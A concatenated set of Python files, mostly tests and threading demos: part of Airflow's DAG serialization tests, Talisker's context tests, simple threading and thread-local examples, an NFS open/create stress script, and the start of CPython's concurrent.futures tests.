google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@pytest.mark.parametrize(
"templated_field, expected_field",
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
],
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {
"is_subdag",
"tasks",
"has_on_success_callback",
"has_on_failure_callback",
"dag_dependencies",
"params",
}
keys_for_backwards_compat: set = {
"_concurrency",
}
dag_params: set = set(dag_schema.keys()) - ignored_keys - keys_for_backwards_compat
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'_pre_execute_hook': None,
'_post_execute_hook': None,
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_active_tis_per_dag': None,
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
"""
Tests serialize_operator, make sure the deps is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskSensor
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_deps_sorted", start_date=execution_date) as dag:
task1 = ExternalTaskSensor(
task_id="task1",
external_dag_id="external_dag_id",
mode="reschedule",
)
task2 = DummyOperator(task_id="task2")
task1 >> task2
serialize_op = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
deps = serialize_op["deps"]
assert deps == [
'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
]
def test_task_group_sorted(self):
"""
Tests serialize_task_group, make sure the list is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.serialization.serialized_objects import SerializedTaskGroup
from airflow.utils.task_group import TaskGroup
"""
start
╱ ╲
╱ ╲
task_group_up1 task_group_up2
(task_up1) (task_up2)
╲ ╱
task_group_middle
(task_middle)
╱ ╲
task_group_down1 task_group_down2
(task_down1) (task_down2)
╲ ╱
╲ ╱
end
"""
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
start = DummyOperator(task_id="start")
with TaskGroup("task_group_up1") as task_group_up1:
_ = DummyOperator(task_id="task_up1")
with TaskGroup("task_group_up2") as task_group_up2:
_ = DummyOperator(task_id="task_up2")
with TaskGroup("task_group_middle") as task_group_middle:
_ = DummyOperator(task_id="task_middle")
with TaskGroup("task_group_down1") as task_group_down1:
_ = DummyOperator(task_id="task_down1")
with TaskGroup("task_group_down2") as task_group_down2:
_ = DummyOperator(task_id="task_down2")
end = DummyOperator(task_id='end')
start >> task_group_up1
start >> task_group_up2
task_group_up1 >> task_group_middle
task_group_up2 >> task_group_middle
task_group_middle >> task_group_down1
task_group_middle >> task_group_down2
task_group_down1 >> end
task_group_down2 >> end
task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_middle"]
)
upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
assert upstream_group_ids == ['task_group_up1', 'task_group_up2']
upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']
downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
assert downstream_group_ids == ['task_group_down1', 'task_group_down2']
task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_down1"]
)
downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
"""
Tests edge_info serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.edgemodifier import Label
with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
task1 = DummyOperator(task_id="task1")
task2 = DummyOperator(task_id="task2")
task1 >> Label("test label") >> task2
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.edge_info == dag.edge_info
@pytest.mark.parametrize(
"mode, expect_custom_deps",
[
("poke", False),
("reschedule", True),
],
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@pytest.mark.parametrize(
"passed_success_callback, expected_value",
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True.
When the callback is not set, has_on_success_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@pytest.mark.parametrize(
"passed_failure_callback, expected_value",
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True.
When the callback is not set, has_on_failure_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@pytest.mark.parametrize(
"object_to_serialized, expected_output",
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{
"staging_schema": [
{"key:": "foo", "value": "bar"},
{"key:": "this", "value": "that"},
"test_conf",
]
},
{
"staging_schema": [
{"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
{
"__type": "dict",
"__var": {"key:": "this", "value": "that"},
},
"test_conf",
]
},
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
(
('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
),
],
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Sets are sorted while list and tuple preserve order"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_params_upgrade(self):
serialized = {
"__version": 1,
"dag": {
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"params": {"none": None, "str": "str", "dict": {"a": "b"}},
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.params["none"] is None
assert isinstance(dict.__getitem__(dag.params, "none"), Param)
assert dag.params["str"] == "str"
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
multithreading.py
|
import time
import threading
def calc_square(numbers):
print("calculate square of numbers")
for n in numbers:
time.sleep(0.1)
print("square", n*n)
def calc_cube(numbers):
print('calculate cube of numbers')
for n in numbers:
time.sleep(0.1)
print("cube", n*n*n)
arr = [2,3,8,9]
to = time.time()
t1 = threading.Thread(target= calc_square, args = (arr,))
t2 = threading.Thread(target = calc_cube, args= (arr,))
t1.start()
t2.start()
t1.join()
t2.join()
print("done in : ", time.time() -to)
print("i am done with all of my work")
|
test_context.py
|
#
# Copyright (c) 2015-2021 Canonical, Ltd.
#
# This file is part of Talisker
# (see http://github.com/canonical-ols/talisker).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import threading
import time
from freezegun import freeze_time
import future.utils
import pytest
from talisker.context import (
Context,
ContextStack,
NullContextStack,
enable_gevent_context,
enable_eventlet_context,
request_timeout,
)
def test_context_api():
Context.new()
Context.logging.push(a=1)
Context.request_id = 'id'
Context.track('test', 1.0)
assert Context.current().logging.flat == {'a': 1}
assert Context.current().request_id == 'id'
assert Context.current().tracking['test'].count == 1
assert Context.current().tracking['test'].time == 1.0
Context.clear()
assert Context.current().logging.flat == {}
assert Context.current().request_id is None
assert Context.current().tracking == {}
def test_null_context():
Context.request_id = 'test'
Context.set_debug()
Context.soft_timeout = 10
Context.set_relative_deadline(10)
Context.track('sql', 1.0)
assert Context.request_id is None
assert Context.debug is False
assert Context.soft_timeout == -1
assert Context.deadline_timeout() is None
assert Context.current().tracking == {}
with Context.logging(foo='bar'):
assert Context.logging.flat == {}
def test_context_thread():
e1 = threading.Event()
e2 = threading.Event()
def worker():
Context.new()
Context.logging.push(a=2)
Context.track('test', 1.0)
e1.set()
e2.wait()
assert Context.logging.flat == {'a': 2}
Context.logging.pop()
e1.set()
assert Context.logging.flat == {}
assert Context.current().tracking['test'].count == 1
t = threading.Thread(target=worker)
Context.new()
Context.track('test', 1.0)
Context.logging.push(a=1)
assert Context.logging.flat == {'a': 1}
t.start()
e1.wait()
e1.clear()
assert Context.logging.flat == {'a': 1}
assert Context.current().tracking['test'].count == 1
e2.set()
e1.wait()
assert Context.logging.flat == {'a': 1}
t.join()
def test_context_gevent(request):
try:
import gevent
except ImportError:
pytest.skip('gevent must be installed')
request.addfinalizer(enable_gevent_context())
def f1():
assert Context.logging.flat == {}
Context.logging.push({'f1': 1})
Context.track('gevent', 1.0)
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
gevent.sleep(0.2) # yield to let f2 run
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
def f2():
assert Context.logging.flat == {}
Context.logging.push({'f2': 2})
Context.track('gevent', 1.0)
assert Context.current().tracking['gevent'].count == 1
assert Context.logging.flat == {'f2': 2}
g1 = gevent.spawn(f1)
g2 = gevent.spawn(f2)
gevent.joinall([g1, g2], timeout=2)
@pytest.mark.skipif(sys.version_info >= (3, 7), reason="<py3.7 only")
def test_context_eventlet(request):
try:
import eventlet
except ImportError:
pytest.skip('eventlet must be installed')
request.addfinalizer(enable_eventlet_context())
def f1():
assert Context.logging.flat == {}
Context.logging.push({'f1': 1})
Context.track('gevent', 1.0)
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
eventlet.sleep(0.2) # yield to let f2 run
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
def f2():
assert Context.logging.flat == {}
Context.logging.push({'f2': 2})
Context.track('gevent', 1.0)
assert Context.current().tracking['gevent'].count == 1
assert Context.logging.flat == {'f2': 2}
pool = eventlet.GreenPool()
pool.spawn(f1)
pool.spawn(f2)
pool.waitall()
if future.utils.PY3:
from tests.py3_asyncio_context import test_context_asyncio # NOQA
def test_stack_basic():
stack = ContextStack()
stack.push(a=1)
assert stack['a'] == 1
assert list(stack.items()) == [('a', 1)]
stack.push(b=2)
assert stack['b'] == 2
assert list(stack.items()) == [('b', 2), ('a', 1)]
stack.push(a=3)
assert stack['a'] == 3
assert list(stack.items()) == [('a', 3), ('b', 2)]
stack.pop()
assert stack['a'] == 1
assert list(stack.items()) == [('b', 2), ('a', 1)]
stack.pop()
assert stack['a'] == 1
assert list(stack.items()) == [('a', 1)]
stack.pop()
with pytest.raises(KeyError):
stack['a']
assert list(stack.items()) == []
def test_stack_context_manager():
stack = ContextStack()
stack.push(a=1)
assert list(stack.items()) == [('a', 1)]
with stack(b=2):
assert list(stack.items()) == [('b', 2), ('a', 1)]
assert list(stack.items()) == [('a', 1)]
def test_stack_dict_arg():
stack = ContextStack()
with stack({'a': 1}):
assert list(stack.items()) == [('a', 1)]
with stack({'a': 1}, b=2):
# order not preserved, as kwargs
assert dict(stack) == {'a': 1, 'b': 2}
def test_stack_unwind():
stack = ContextStack()
stack.push(a=1)
assert stack['a'] == 1
level = stack.push(a=2)
assert stack['a'] == 2
stack.push(a=3)
stack.push(a=4)
assert stack['a'] == 4
stack.unwind(level)
assert stack['a'] == 1
def test_null_context_stack():
stack = NullContextStack()
stack.push(a=1)
assert dict(stack) == {}
assert stack.flat == {}
def test_does_not_use_or_modify_dict():
stack = ContextStack()
d = {'a': 1}
stack.push(d, b=2)
assert stack['a'] == 1
assert stack['b'] == 2
assert d == {'a': 1}
d['a'] = 2
assert stack['a'] == 1
def test_tracking():
Context.new()
Context.track('sql', 1.0)
Context.track('sql', 2.0)
Context.track('http', 3.0)
assert Context.current().tracking['sql'].count == 2
assert Context.current().tracking['sql'].time == 3.0
assert Context.current().tracking['http'].count == 1
assert Context.current().tracking['http'].time == 3.0
@freeze_time()
def test_request_timeout():
Context.new()
result = {}
@request_timeout(timeout=1000, soft_timeout=500)
def f():
result['timeout'] = Context.current().deadline
result['soft_timeout'] = Context.soft_timeout
f()
assert result['timeout'] == time.time() + 1.0
assert result['soft_timeout'] == 500
|
thread_local.py
|
#!/usr/bin/env python3
import threading
# thread local is used to args delivery between functions in one thread
local_school = threading.local()
def process_student():
std = local_school.student
print('Hello, %s (in %s)' % (std, threading.current_thread().name))
def process_thread(name):
local_school.student = name
process_student()
t1 = threading.Thread(target=process_thread, args=('Alice',), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob',), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()
|
open_create_stress.py
|
#!/usr/bin/env python3.6
"""
author: samuels (c) 2018
"""
import argparse
import time
import os
import sys
from queue import Queue
from threading import Thread
sys.path.append(os.path.join(os.path.join('../')))
from client.generic_mounter import Mounter
from logger.server_logger import ConsoleLogger
logger = None
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--cluster", help="Cluster Name", required=True, type=str)
parser.add_argument("-e", "--export", help="NFS Export", default="/", type=str)
parser.add_argument("-d", "--test_dir", help="Directory under test", default="", type=str)
parser.add_argument('--start_vip', type=str, help="Start VIP address range")
parser.add_argument('--end_vip', type=str, help="End VIP address range")
return parser.parse_args()
def open_file_for_n_sec(q1, n, path):
global logger
i = 0
while True:
try:
filename = q1.get()
file_path = os.path.join(path, filename)
i += 1
if i % 1000:
sys.stdout.write('.')
sys.stdout.flush()
f = open(file_path, 'w')
f.write('abcd')
f.flush()
os.unlink(file_path)
# time.sleep(.01)
f.close()
except (IOError, OSError) as err:
logger.error("Thread raised error: {}".format(err))
raise err
def main():
global logger
logger = ConsoleLogger('bmp_split_stress').logger
q1 = Queue(maxsize=10)
num_threads = 100
num_files = 100000
args = get_args()
logger.info("Mounting work path...")
mounter = Mounter(args.cluster, args.export, 'nfs3', 'OPEN_CREATE_STRESS', logger=logger, nodes=0,
domains=0, sudo=True, start_vip=args.start_vip, end_vip=args.end_vip)
try:
mounter.mount_all_vips()
except AttributeError:
logger.warn("VIP range is bad or None. Falling back to mounting storage server IP")
mounter.mount()
for i in range(num_threads):
path = mounter.get_random_mountpoint()
worker = Thread(target=open_file_for_n_sec, args=(q1, 1, path))
worker.setDaemon(True)
worker.start()
for i in range(num_files):
q1.put('t%d' % i)
time.sleep(2)
if __name__ == "__main__":
main()
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, ctx):
mgr = get_context(ctx).Manager()
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
